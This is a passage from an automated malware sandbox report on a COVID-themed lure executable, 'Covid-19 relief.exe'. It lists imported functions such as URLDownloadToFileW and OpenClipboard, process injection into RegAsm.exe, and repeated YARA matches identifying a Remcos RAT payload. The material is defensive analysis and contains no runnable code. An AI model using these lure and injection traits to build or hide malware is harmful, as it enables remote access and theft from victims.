std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait5_2_0040D2A6
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304DF1_2_00C304DF
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304F01_2_00C304F0
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304DF1_2_00C304DF
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_00C304F01_2_00C304F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A62_2_0040D2A6
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D704DF3_2_00D704DF
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_00D704F03_2_00D704F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D2A65_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413E72 appears 49 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041203B appears 31 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413E72 appears 98 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041203B appears 62 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414176 appears 50 times
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927312165.0000000006E70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000003.00000002.927477346.0000000004DA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927722605.0000000006F70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000001.00000002.927312165.0000000006E70000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Covid-19 relief.exe
            Source: Covid-19 relief.exe, 00000003.00000002.927477346.0000000004DA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEbEiYZnqlvIsNbUE.bounce.exe4 vs Covid-19 relief.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: Covid-19 relief.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
